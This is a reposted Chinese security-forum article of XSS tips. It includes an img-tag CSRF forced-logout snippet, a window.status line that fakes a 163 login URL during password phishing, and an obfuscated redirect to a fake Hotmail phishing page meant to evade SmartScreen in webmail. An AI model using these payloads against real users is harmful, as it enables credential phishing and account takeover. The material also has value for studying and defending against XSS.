XSS两三事

admin 2021年4月27日04:43:51评论47 views字数 1481阅读4分56秒阅读模式

这几天发现论坛里讨论XSS的帖子多了起来,刚好我以前也折腾过一阵子XSS,就斗胆来和大家交流分享下。


下面分享几个不算tipstips,应该很多大牛在利用XSS时都注意到了,但我还是再写一下吧,帮大家做个备忘。


#1 使用img标签进行CSRF
之前瞌睡龙兄弟在http://www.t00ls.net/thread-19431-1-2.html帖子中提到了需要利用CSRF来实现强制用户退出。

在原贴中是这样写的:

XSS两三事


其实不用这么麻烦,直接用下面的类似代码就可以实现一样的效果

1 <img src="http://www.t00ls.net/logging.php?action=logout&formhash=1111111" />


img标签使用src属性时会触发一个GET请求,我们刚好可以利用它来实现CSRF攻击。
当前浏览器中保存了用户的session的话,用户访问包含以上代码的页面就会自动退出,达到了我们的目的。

#2 钓鱼时浏览器状态栏的问题
很多人在渗透中都热衷于先搞下目标的邮箱,各种XSS MAIL发的飞起,有偷cookies的,有钓密码的。


就拿钓密码的例子来讲,在执行payload时,有没有发现浏览器的状态栏那里略显尴尬?

呵呵,在你那段payload中加一句类似

1 window.status='https://login.163.com/ppsecure/post.srf?wa=wsignin1.0...';

这样的代码吧。


会让整个钓鱼场景看起来会更和谐的(链接后面的...是精髓,lol)。
效果图:

XSS两三事


#3 某MAIL XSS利用的一点细节
既然谈到了XSS MAIL的事,就多聊点,也是我以前遇到过的。
常搞渗透的各位牛应该知道某邮箱的cookie拿来是用不了的。

所以该邮箱XSS的利用方式一般都是跳到自己的页面钓密码(当然也有直接利用ajax读邮件的)。


但是直接在payload中写自己钓鱼用的链接,然后发出去,到了目标的收件箱里,点开邮件后是这样的,不会执行我们的payload。

XSS两三事

不过在目标邮箱里把自己的发信箱添加成联系人之后再发就不会出现这种情况了,当然这不现实。。。


原因是SmartScreen这货会检查邮件中所附带的链接,应该是靠一种白名单机制检测,不匹配就拦。


详细的看这里吧

http://www.microsoft.com/mscorp/ ... derid/overview.mspx
貌似就是这个东西在作怪。


当然,既然这里都能执行JS了,绕过这个检测机制也就不是什么难事了,把链接混淆下就行,像下面这样:

1 eval(window.location.replace('hfuckttfuckp:fuck/fuck/1fuck11.111.fuck111.11/sn123w.snt1fuck23.mafuckil.fucklivefuck.cfuckom/hofucktmailfuck.htm'.replace(/fuck/g,'')))

修改好payload之后再测试,发现不会被SmartScreen拦了,打开邮件直接跳转,bingo!


就先写这么多吧,我是想到哪写到哪,不走大脑的,没什么逻辑,文中有什么疏漏也请各位看官轻踩,欢迎批评指正。

这里只是抛砖引玉,欢迎各路神仙在下面一起交流分享。

最后送给大家个小工具,是Fiddler的插件,不是什么神器,不是什么大杀器,使用简单,具体的自己用用看吧。
xss测试插件
http://115.com/file/bhkc5yx2

本文始发于微信公众号(T00ls):XSS两三事

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月27日04:43:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XSS两三事http://cn-sec.com/archives/352614.html

发表评论

匿名网友 填写信息